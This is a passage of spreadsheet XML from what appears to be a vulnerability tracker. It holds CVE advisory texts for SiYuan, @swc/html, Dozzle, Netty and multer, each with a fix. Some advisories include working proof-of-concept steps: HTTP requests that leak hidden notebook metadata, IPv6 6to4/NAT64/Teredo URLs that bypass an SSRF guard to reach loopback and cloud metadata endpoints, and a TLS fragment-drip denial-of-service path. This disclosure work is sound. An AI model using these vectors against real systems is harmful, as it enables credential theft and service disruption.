s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1586" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1586" s="5" t="inlineStr" /><c r="R1586" s="5" t="inlineStr" /><c r="S1586" s="5" t="inlineStr"><is><t>**CVE:** This vulnerability corresponds to [CVE-2026-72790](https://nvd.nist.gov/vuln/detail/CVE-2026-72790).

### Relationship to GHSA-8x84-r2ff-h8pq (please read first)

`getNotebookInfo` is named in the earlier advisory GHSA-8x84-r2ff-h8pq, in its remediation section, which asked for reader filtering on both `getNotebookConf` and `getNotebookInfo`. Commit `3bc014c7d` applied that filtering to `getNotebookConf` only.

That advisory grouped `getNotebookInfo` under `BoxCrypt`, and `getNotebookInfo` never returns `BoxCrypt`. Anyone checking the handler for key material would correctly find none and move on. This report corrects that characterisation and states what the handler actually discloses, which is notebook metadata rather than key material. If you would prefer this tracked as a follow-up on the original advisory rather than separately, that is entirely reasonable.

### Summary

`/api/notebook/getNotebookInfo` is registered with `CheckAuth` only and applies no authorization check of any kind. Given a notebook identifier, it returns that notebook's author-written name, document count, total size and creation and modification timestamps. It does so for every notebook the server has loaded, including notebooks that `lsNotebooks` deliberately withholds from readers because they are closed or not publish-visible.

### Details

| Item | Detail |
|---|---|
| Route | `kernel/api/router.go:123` `POST /api/notebook/getNotebookInfo` → `model.CheckAuth` → `getNotebookInfo` |
| Middleware | `CheckAuth` only, no `CheckReadonly`, no `CheckAdminRole` |
| Guard in handler | None. `IsReadOnlyRoleContext`, `publishAccess`, `Visible` and `Closed` all return zero matches |
| Exposed | `BoxInfo{ID, Name, DocCount, Size, HSize, Mtime, CTime, HMtime, HCtime}` |
| Affected refs | `eef105683` (v3.7.3, master HEAD) and `v3.7.4-alpha.1`, handler identical on both |

**The handler.** It validates `boxID` against the ID pattern, calls `box := model.Conf.Box(boxID)`, returns a not-found response if that is nil, and otherwise returns `box.GetInfo()` unmodified. `GetInfo()` (`kernel/model/box.go:470`) walks the notebook's files and returns the metadata listed above. There is no ownership check and no publish-access check anywhere on the path.

The nil branch is also a minor existence oracle: a valid-format identifier that names no loaded notebook is distinguishable from one that does.

**Guarded sibling.** `lsNotebooks`, the notebook lister, is also reader-reachable and does filter. For read-only roles it skips any notebook where `notebook.Closed` holds, and skips any notebook whose publish-access entry has `!item.Visible`. The codebase therefore intends closed and non-published notebooks to be invisible to readers. `getNotebookInfo` returns their name and statistics to any reader who supplies the identifier.

**Precedent.** GHSA-f2rw-w22v-54vh restricted `getEncryptedNotebookStatus`, which disclosed encrypted-notebook names and lock state, to administrators. `getNotebookInfo` is the non-encrypted analogue, disclosing regular notebook names and statistics including for notebooks outside the reader's publish scope, and was not restricted.

**Reachability, stated precisely, because it differs by branch.**

On v3.7.3 a reader can obtain the identifier of a notebook they cannot see, by chaining two endpoints that are currently ungated on that branch. `getBlockDefIDsByRefText` returns block and document identifiers workspace-wide, including from hidden notebooks. `getPathByID` then returns the owning notebook identifier for any such block, in its `notebook` field. `getFullHPathByID` additionally discloses the notebook name directly. The chain requires no special conditions beyond a reference text that occurs somewhere in the workspace.

On the development branch those sources are already closed. `getPathByID` now gates through `CheckBlockIdMetadataAccessableByPublishAccessInBox`, `getIDsByHPath` through `filterFileTreeBlockIDsByPublishDiscoverability`, and `getBlockDefIDsByRefText` and `getFullHPathByID` are likewise gated. Notebook identifiers are a fourteen-digit timestamp plus seven random characters, and `Conf.Box(boxID)` returns non-nil only for loaded notebooks, so guessing is not practical. A reader-reachable route on the development branch that yields the identifier of a hidden notebook was not found.

So on the development branch this is defence in depth rather than a live path. It is reported because the handler itself remains unguarded on both branches, and because closing it removes any dependence on those identifier sources staying gated in future.

### Proof of Concept

Precondition: publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. A notebook that is closed or not publish-visible. Steps 1 and 2 apply to v3.7.3; on the development branch, start at step 3 with a known identifier.

Step 1, obtain block identifiers workspace-wide:

```
POST http://127.0.0.1:6808/api/block/getBlockDefIDsByRefText
{"anchor":"&lt;a word likely to occur anywhere in the workspace&gt;"}

→ 200, block and document identifiers including ones inside hidden notebooks
```

Step 2, resolve one to its owning notebook:

```
POST http://127.0.0.1:6808/api/filetree/getPathByID
{"id":"&lt;identifier from step 1&gt;"}

→ 200, the notebook field carries the hidden notebook's boxID
```

Step 3, read the notebook's metadata:

```
POST http://127.0.0.1:6808/api/notebook/getNotebookInfo
{"notebook":"&lt;boxID from step 2&gt;"}

→ 200, returns name, docCount, size, hSize, mtime, ctime, hMtime, hCtime
   for a notebook that lsNotebooks does not return to this same session
```

The differential is the point: call `lsNotebooks` with the same session and confirm the notebook is absent from the list, then call `getNotebookInfo` and receive its name and statistics.

### Impact

An anonymous reader in publish mode, or any publish `RoleReader`, can read the author-written name, document count, total size and activity timestamps of notebooks that are closed or not published, which are exactly the notebooks the notebook lister withholds from them. Notebook names are free text chosen by the author and routinely describe their contents. Document count and size indicate scale, and the modification timestamp reveals recent activity in a workspace area the reader has no access to. Confidentiality only, with no integrity or availability impact, and no document content is disclosed.

### Suggested fix

Apply the same filtering `lsNotebooks` already performs. When `IsReadOnlyRoleContext(c)` holds, return the not-found response unless the notebook is publish-visible and not closed, before calling `GetInfo()`. This is the reader filtering the earlier advisory's remediation section requested for this handler.</t></is></c><c r="T1586" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72790</t></is></c></row><row r="1587"><c r="A1587" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1587" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1587" s="5" t="inlineStr"><is><t>CVE-2026-72925</t></is></c><c r="D1587" s="5" t="inlineStr" /><c r="E1587" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1587" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1587" s="5" t="inlineStr" /><c r="H1587" s="5" t="n"><v>0.002</v></c><c r="I1587" s="5" t="inlineStr" /><c r="J1587" s="5" t="inlineStr" /><c r="K1587" s="5" t="inlineStr" /><c r="L1587" s="5" t="inlineStr"><is><t>crates.io:swc_html_minifier, npm:@swc/html</t></is></c><c r="M1587" s="5" t="inlineStr"><is><t>1.15.47-nightly-20260729.1, 59.0.0</t></is></c><c r="N1587" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1587" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1587" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1587" s="5" t="inlineStr" /><c r="R1587" s="5" t="inlineStr" /><c r="S1587" s="5" t="inlineStr"><is><t>## Impact

`@swc/html` minifies JSON contained in `script` elements such as
`application/json` and `application/ld+json` by parsing and serializing the
JSON value.

Before the patched versions, JSON serialization could convert escaped
less-than signs such as `\u003C` into literal `&lt;` characters. If the JSON
contained an escaped `&lt;/script&gt;` sequence, the generated HTML could terminate
the containing script element early because HTML tokenization occurs before
the JSON is consumed.

Applications that minify HTML containing attacker-controlled JSON data could
therefore transform inert data into active markup. A crafted payload could
execute script in the origin of the generated page.

## Patches

The issue is fixed in:

- `@swc/html` 1.15.47
- `swc_html_minifier` 59.0.0

The minifier now re-escapes less-than signs after JSON serialization, preserving
the script element boundary.

## Workarounds

Users who cannot upgrade can disable JSON minification with:

```js
await minify(html, {
  minifyJson: false,
});</t></is></c><c r="T1587" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72925</t></is></c></row><row r="1588"><c r="A1588" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1588" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1588" s="5" t="inlineStr"><is><t>CVE-2026-73087</t></is></c><c r="D1588" s="5" t="inlineStr" /><c r="E1588" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1588" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1588" s="5" t="inlineStr" /><c r="H1588" s="5" t="n"><v>0.003</v></c><c r="I1588" s="5" t="inlineStr" /><c r="J1588" s="5" t="inlineStr" /><c r="K1588" s="5" t="inlineStr" /><c r="L1588" s="5" t="inlineStr"><is><t>Go:github.com/amir20/dozzle</t></is></c><c r="M1588" s="5" t="inlineStr"><is><t>1.29.1-0.20260804193351-8cf7ccd5ee04</t></is></c><c r="N1588" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1588" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1588" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1588" s="5" t="inlineStr" /><c r="R1588" s="5" t="inlineStr" /><c r="S1588" s="5" t="inlineStr"><is><t>## Summary

The `isBlockedIP` SSRF guard in Dozzle's webhook notification dispatcher blocks loopback, link-local, multicast, and unspecified addresses but does not recognize IPv6 transition mechanism addresses (RFC 3056 6to4, RFC 6052 NAT64, RFC 4380 Teredo) that embed arbitrary IPv4 addresses. An authenticated user can bypass the guard to reach loopback services, cloud metadata endpoints (169.254.169.254), and other blocked ranges via webhook notification URLs.

## Affected component / versions

- Package: `github.com/amir20/dozzle`
- Affected versions: all versions with SSRF guard (current HEAD [`b9df313`](https://github.com/amir20/dozzle/commit/b9df31356fc024e6768a1aac605844dc041d95ee))
- Vulnerable code: `internal/notification/dispatcher/webhook.go`

## Details

### Root cause (CWE-918)

[`internal/notification/dispatcher/webhook.go:32-51`](https://github.com/amir20/dozzle/blob/b9df31356fc024e6768a1aac605844dc041d95ee/internal/notification/dispatcher/webhook.go#L32-L51):

```go
func isBlockedIP(ip net.IP) bool {
	if ip.IsLoopback() ||
		ip.IsLinkLocalUnicast() ||
		ip.IsLinkLocalMulticast() ||
		ip.IsMulticast() ||
		ip.IsInterfaceLocalMulticast() ||
		ip.IsUnspecified() {
		return true
	}
	if v4 := ip.To4(); v4 != nil &amp;&amp; zeroNetV4.Contains(v4) {
		return true
	}
	if ip.Equal(net.IPv4bcast) {
		return true
	}
	return false
}
```

The guard intentionally allows RFC 1918 private ranges for self-hosted webhook targets, but blocks loopback (127.0.0.0/8, ::1), link-local (169.254.0.0/16, fe80::/10), and other non-routable addresses. IPv6 transition mechanism addresses bypass all these checks:

| Mechanism | Prefix | Embeds | `isBlockedIP` result |
|-----------|--------|--------|---------------------|
| 6to4 | `2002::/16` | any IPv4 in bits 16-47 | `false` |
| NAT64 WKP | `64:ff9b::/96` | any IPv4 in bits 96-127 | `false` |
| Teredo | `2001:0000::/32` | any IPv4 in bits 96-127 | `false` |

### Reachability / trust boundary

The `safeDialContext` function (line 53) resolves hostnames and checks each IP against `isBlockedIP` before establishing a TCP connection. This is used as the `DialContext` for the webhook HTTP client (line 115).

Webhook URLs are configured by authenticated Dozzle users through the notification settings UI. The guard exists to prevent authenticated users from using webhook delivery as a proxy to reach the host machine's loopback services or cloud metadata endpoint.

### Attack chain

1. Authenticated user creates a webhook notification with URL `http://[2002:7f00:0001::1]:8080/` (6to4 embedding 127.0.0.1)
2. When a notification triggers, Dozzle's webhook dispatcher calls `safeDialContext`
3. The IPv6 address `2002:7f00:0001::1` is checked against `isBlockedIP` -- all predicates return false
4. Connection proceeds to the 6to4 relay which routes to 127.0.0.1
5. The webhook POST reaches the host's loopback services

## Impact

An authenticated user can bypass the SSRF guard to:

- Reach cloud metadata service at 169.254.169.254 via `2002:a9fe:a9fe::1` (6to4) to steal instance credentials
- Reach localhost services via `64:ff9b::7f00:1` (NAT64) or `2002:7f00:0001::1` (6to4)
- The webhook response body is logged at debug level but not returned to the user, making this a semi-blind SSRF (status code is returned)

Note: RFC 1918 private ranges are intentionally allowed by the guard. This bypass specifically targets the blocked ranges (loopback and link-local/metadata) that the guard explicitly intends to prevent.

## Proof of concept

Bypass vectors:

```
# 6to4 embedding 127.0.0.1 (bypasses IsLoopback)
http://[2002:7f00:0001::1]:8080/

# NAT64 embedding 169.254.169.254 (bypasses IsLinkLocalUnicast)
http://[64:ff9b::a9fe:a9fe]/latest/meta-data/

# 6to4 embedding 169.254.169.254 (bypasses IsLinkLocalUnicast)
http://[2002:a9fe:a9fe::1]/latest/meta-data/

# Teredo embedding 127.0.0.1
http://[2001:0000:dead:beef:0000:0000:7f00:0001]:8080/
```

Verification that `isBlockedIP` returns false for all vectors:

```go
package main

import (
    "fmt"
    "net"
)

func isBlockedIP(ip net.IP) bool {
    return ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() ||
        ip.IsMulticast() || ip.IsInterfaceLocalMulticast() || ip.IsUnspecified()
}

func main() {
    for _, v := range []string{
        "2002:7f00:0001::1",    // 6to4 -&gt; 127.0.0.1
        "64:ff9b::a9fe:a9fe",   // NAT64 -&gt; 169.254.169.254
        "2002:a9fe:a9fe::1",    // 6to4 -&gt; 169.254.169.254
    } {
        ip := net.ParseIP(v)
        fmt.Printf("%-35s blocked=%v\n", v, isBlockedIP(ip))
    }
}
// Output: all false
```

## Remediation

Add IPv6 transition mechanism prefix checks to `isBlockedIP`:

```go
func isBlockedIP(ip net.IP) bool {
	// ... existing checks ...

	// IPv6 transition mechanisms embedding arbitrary IPv4
	if len(ip) == net.IPv6len {
		if ip[0] == 0x20 &amp;&amp; ip[1] == 0x02 { return true } // 6to4
		if ip[0] == 0x00 &amp;&amp; ip[1] == 0x64 &amp;&amp; ip[2] == 0xff &amp;&amp; ip[3] == 0x9b { return true } // NAT64
		if ip[0] == 0x20 &amp;&amp; ip[1] == 0x01 &amp;&amp; ip[2] == 0x00 &amp;&amp; ip[3] == 0x00 { return true } // Teredo
	}
	return false
}
```

## Credit

Reported by tonghuaroot (tonghuaroot@gmail.com).</t></is></c><c r="T1588" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73087</t></is></c></row><row r="1589"><c r="A1589" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1589" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1589" s="5" t="inlineStr"><is><t>CVE-2026-73262</t></is></c><c r="D1589" s="5" t="inlineStr" /><c r="E1589" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1589" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1589" s="5" t="inlineStr" /><c r="H1589" s="5" t="n"><v>0.002</v></c><c r="I1589" s="5" t="inlineStr" /><c r="J1589" s="5" t="inlineStr" /><c r="K1589" s="5" t="inlineStr" /><c r="L1589" s="5" t="inlineStr"><is><t>PyPI:prowler, PyPI:prowler-cloud</t></is></c><c r="M1589" s="5" t="inlineStr"><is><t>5.37.0</t></is></c><c r="N1589" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1589" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1589" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1589" s="5" t="inlineStr" /><c r="R1589" s="5" t="inlineStr" /><c r="S1589" s="5" t="inlineStr"><is><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is></c><c r="T1589" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73262</t></is></c></row><row r="1590"><c r="A1590" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1590" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1590" s="5" t="inlineStr"><is><t>CVE-2026-73294</t></is></c><c r="D1590" s="5" t="inlineStr" /><c r="E1590" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1590" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1590" s="5" t="inlineStr" /><c r="H1590" s="5" t="n"><v>0.006</v></c><c r="I1590" s="5" t="inlineStr" /><c r="J1590" s="5" t="inlineStr" /><c r="K1590" s="5" t="inlineStr" /><c r="L1590" s="5" t="inlineStr"><is><t>Go:github.com/semaphoreui/semaphore</t></is></c><c r="M1590" s="5" t="inlineStr"><is><t>0.0.0-20260704181911-7e8a9434bd81</t></is></c><c r="N1590" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1590" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1590" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1590" s="5" t="inlineStr" /><c r="R1590" s="5" t="inlineStr" /><c r="S1590" s="5" t="inlineStr"><is><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is></c><c r="T1590" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73294</t></is></c></row><row r="1591"><c r="A1591" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1591" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1591" s="5" t="inlineStr"><is><t>CVE-2026-73558</t></is></c><c r="D1591" s="5" t="inlineStr" /><c r="E1591" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1591" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1591" s="5" t="inlineStr" /><c r="H1591" s="5" t="n"><v>0.003</v></c><c r="I1591" s="5" t="inlineStr" /><c r="J1591" s="5" t="inlineStr" /><c r="K1591" s="5" t="inlineStr" /><c r="L1591" s="5" t="inlineStr"><is><t>PyPI:vllm</t></is></c><c r="M1591" s="5" t="inlineStr"><is><t>0.27.0</t></is></c><c r="N1591" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1591" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1591" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1591" s="5" t="inlineStr" /><c r="R1591" s="5" t="inlineStr" /><c r="S1591" s="5" t="inlineStr"><is><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is></c><c r="T1591" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73558</t></is></c></row><row r="1592"><c r="A1592" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1592" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1592" s="5" t="inlineStr"><is><t>CVE-2026-73560</t></is></c><c r="D1592" s="5" t="inlineStr" /><c r="E1592" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1592" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1592" s="5" t="inlineStr" /><c r="H1592" s="5" t="n"><v>0.003</v></c><c r="I1592" s="5" t="inlineStr" /><c r="J1592" s="5" t="inlineStr" /><c r="K1592" s="5" t="inlineStr" /><c r="L1592" s="5" t="inlineStr"><is><t>PyPI:vllm</t></is></c><c r="M1592" s="5" t="inlineStr"><is><t>0.26.0</t></is></c><c r="N1592" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1592" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1592" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1592" s="5" t="inlineStr" /><c r="R1592" s="5" t="inlineStr" /><c r="S1592" s="5" t="inlineStr"><is><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is></c><c r="T1592" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73560</t></is></c></row><row r="1593"><c r="A1593" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1593" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1593" s="5" t="inlineStr"><is><t>CVE-2026-75595</t></is></c><c r="D1593" s="5" t="inlineStr" /><c r="E1593" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1593" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1593" s="5" t="inlineStr" /><c r="H1593" s="5" t="n"><v>0.003</v></c><c r="I1593" s="5" t="inlineStr" /><c r="J1593" s="5" t="inlineStr" /><c r="K1593" s="5" t="inlineStr" /><c r="L1593" s="5" t="inlineStr"><is><t>Maven:io.netty:netty-handler</t></is></c><c r="M1593" s="5" t="inlineStr"><is><t>4.1.137.Final, 4.2.17.Final</t></is></c><c r="N1593" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1593" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1593" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1593" s="5" t="inlineStr" /><c r="R1593" s="5" t="inlineStr" /><c r="S1593" s="5" t="inlineStr"><is><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is></c><c r="T1593" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75595</t></is></c></row><row r="1594"><c r="A1594" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1594" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1594" s="5" t="inlineStr"><is><t>CVE-2026-75596</t></is></c><c r="D1594" s="5" t="inlineStr" /><c r="E1594" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1594" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1594" s="5" t="inlineStr" /><c r="H1594" s="5" t="n"><v>0.004</v></c><c r="I1594" s="5" t="inlineStr" /><c r="J1594" s="5" t="inlineStr" /><c r="K1594" s="5" t="inlineStr" /><c r="L1594" s="5" t="inlineStr"><is><t>Maven:io.netty:netty-handler</t></is></c><c r="M1594" s="5" t="inlineStr"><is><t>4.1.137.Final, 4.2.17.Final</t></is></c><c r="N1594" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1594" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1594" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1594" s="5" t="inlineStr" /><c r="R1594" s="5" t="inlineStr" /><c r="S1594" s="5" t="inlineStr"><is><t>### Summary

Netty's default SNI entrypoint reparses and recopies previously received ClientHello fragments on every additional TLS handshake record. A remote peer can send a small first record that advertises a large ClientHello length and then drip the body in many tiny records, causing **superlinear (quadratic) CPU work** before the handshake completes. With 4095 one-byte fragments, the handler recopies **8,386,560 bytes** from only **24,579 bytes** on the wire — a **341× amplification** ratio.

### Affected Entrypoints

- `io.netty.handler.ssl.SniHandler` — default constructors
- `io.netty.handler.ssl.SslClientHelloHandler` — pre-handshake ClientHello aggregation path

### Vulnerable Code Locations

- `handler/src/main/java/io/netty/handler/ssl/SniHandler.java:85`
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:75` (decode entry)
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:165` (handshakeBuffer.clear)
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:174` (writeBytes re-copy)
- `codec-base/src/main/java/io/netty/handler/codec/ByteToMessageDecoder.java:294` (cumulation retention)

### Exploit Path

```
1. TCP connection → SniHandler → SslClientHelloHandler.decode
2. First record: TLS handshake header declaring large ClientHello length (e.g., 4096 bytes)
3. Attacker sends thousands of tiny follow-on handshake records (1 byte each)
4. On each fragment: handshakeBuffer.clear() + writeBytes() re-copies ALL accumulated body bytes
5. Total bytes copied = n*(n+1)/2 where n = number of body bytes → quadratic
6. Event-loop CPU exhausted before SslHandler takes over
```

### Impact

- **Vulnerability Type:** Inefficient Algorithmic Complexity
- An unauthenticated network attacker can drive disproportionate CPU consumption on the Netty event loop
- Affects **all** Netty deployments using `SniHandler` for TLS termination (the default SNI path)
- No privileges, user interaction, or special configuration required
- Can degrade or stall TLS connection handling for all clients on the affected event loop
- The attack requires only modest bandwidth (~25 KB) to trigger significant CPU work

---
### Credits

Found by a security research team from the University of Sydney, focusing on detecting open source software vulnerabilities.
Liyi Zhou: https://lzhou1110.github.io/
Ziyue Wang: https://zyy0530.github.io/
Strick: https://str1ckl4nd.github.io/
Maurice: https://maurice.busystar.org/
Chenchen Yu: https://7thparkk.github.io/</t></is></c><c r="T1594" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75596</t></is></c></row><row r="1595"><c r="A1595" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1595" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1595" s="5" t="inlineStr"><is><t>CVE-2026-75604</t></is></c><c r="D1595" s="5" t="inlineStr" /><c r="E1595" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1595" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1595" s="5" t="inlineStr" /><c r="H1595" s="5" t="n"><v>0.025</v></c><c r="I1595" s="5" t="inlineStr" /><c r="J1595" s="5" t="inlineStr" /><c r="K1595" s="5" t="inlineStr" /><c r="L1595" s="5" t="inlineStr"><is><t>npm:next</t></is></c><c r="M1595" s="5" t="inlineStr"><is><t>15.5.24, 16.3.3</t></is></c><c r="N1595" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1595" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1595" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1595" s="5" t="inlineStr" /><c r="R1595" s="5" t="inlineStr" /><c r="S1595" s="5" t="inlineStr"><is><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is></c><c r="T1595" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75604</t></is></c></row><row r="1596"><c r="A1596" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1596" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1596" s="5" t="inlineStr"><is><t>CVE-2026-77037</t></is></c><c r="D1596" s="5" t="inlineStr" /><c r="E1596" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1596" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1596" s="5" t="inlineStr" /><c r="H1596" s="5" t="n"><v>0.003</v></c><c r="I1596" s="5" t="inlineStr" /><c r="J1596" s="5" t="inlineStr" /><c r="K1596" s="5" t="inlineStr" /><c r="L1596" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M1596" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N1596" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1596" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1596" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1596" s="5" t="inlineStr" /><c r="R1596" s="5" t="inlineStr" /><c r="S1596" s="5" t="inlineStr"><is><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is></c><c r="T1596" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77037</t></is></c></row><row r="1597"><c r="A1597" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1597" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1597" s="5" t="inlineStr"><is><t>CVE-2026-77063</t></is></c><c r="D1597" s="5" t="inlineStr" /><c r="E1597" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1597" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1597" s="5" t="inlineStr" /><c r="H1597" s="5" t="n"><v>0.002</v></c><c r="I1597" s="5" t="inlineStr" /><c r="J1597" s="5" t="inlineStr" /><c r="K1597" s="5" t="inlineStr" /><c r="L1597" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M1597" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N1597" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1597" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1597" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1597" s="5" t="inlineStr" /><c r="R1597" s="5" t="inlineStr" /><c r="S1597" s="5" t="inlineStr"><is><t>### Impact

When `multer` is configured with an asynchronous `fileFilter`, the `limits.fileSize` limit can be bypassed. The `'limit'` event is registered inside the async `fileFilter` callback, so if a file exceeds `limits.fileSize` before that callback runs, the event is missed and the oversized upload is accepted instead of being rejected with a `LIMIT_FILE_SIZE` error. Applications that rely on `limits.fileSize` to reject oversized uploads are affected on all upload methods (`.single()`, `.array()`, `.fields()`, `.any()`). Uploads using a synchronous `fileFilter` are not affected.

### Patches

Users should upgrade to `2.3.0`.

### Workarounds

Use a synchronous `fileFilter`, or validate the uploaded file size after the upload completes.</t></is></c><c r="T1597" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77063</t></is></c></row><row r="1598"><c r="A1598" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1598" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1598" s="5" t="inlineStr"><is><t>CVE-2026-77078</t></is></c><c r="D1598" s="5" t="inlineStr" /><c r="E1598" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1598" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1598" s="5" t="inlineStr" /><c r="H1598" s="5" t="n"><v>0.003</v></c><c r="I1598" s="5" t="inlineStr" /><c r="J1598" s="5" t="inlineStr" /><c r="K1598" s="5" t="inlineStr" /><c r="L1598" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M1598" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N1598" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1598" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1598" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1598" s="5" t="inlineStr" /><c r="R1598" s="5" t="inlineStr" /><c r="S1598" s="5" t="inlineStr"><is><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is></c><c r="T1598" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77078</t></is></c></row><row r="1599"><c r="A1599" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1599" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1599" s="5" t="inlineStr"><is><t>CVE-2026-7809</t></is></c><c r="D1599" s="5" t="inlineStr" /><c r="E1599" s="5" t="inlineStr" /><c r="F1599" s="5" t="inlineStr" /><c r="G1599" s="5" t="inlineStr" /><c r="H1599" s="5" t="inlineStr" /><c r="I1599" s="5" t="inlineStr" /><c r="J1599" s="5" t="inlineStr" /><c r="K1599" s="5" t="inlineStr" /><c r="L1599" s="5" 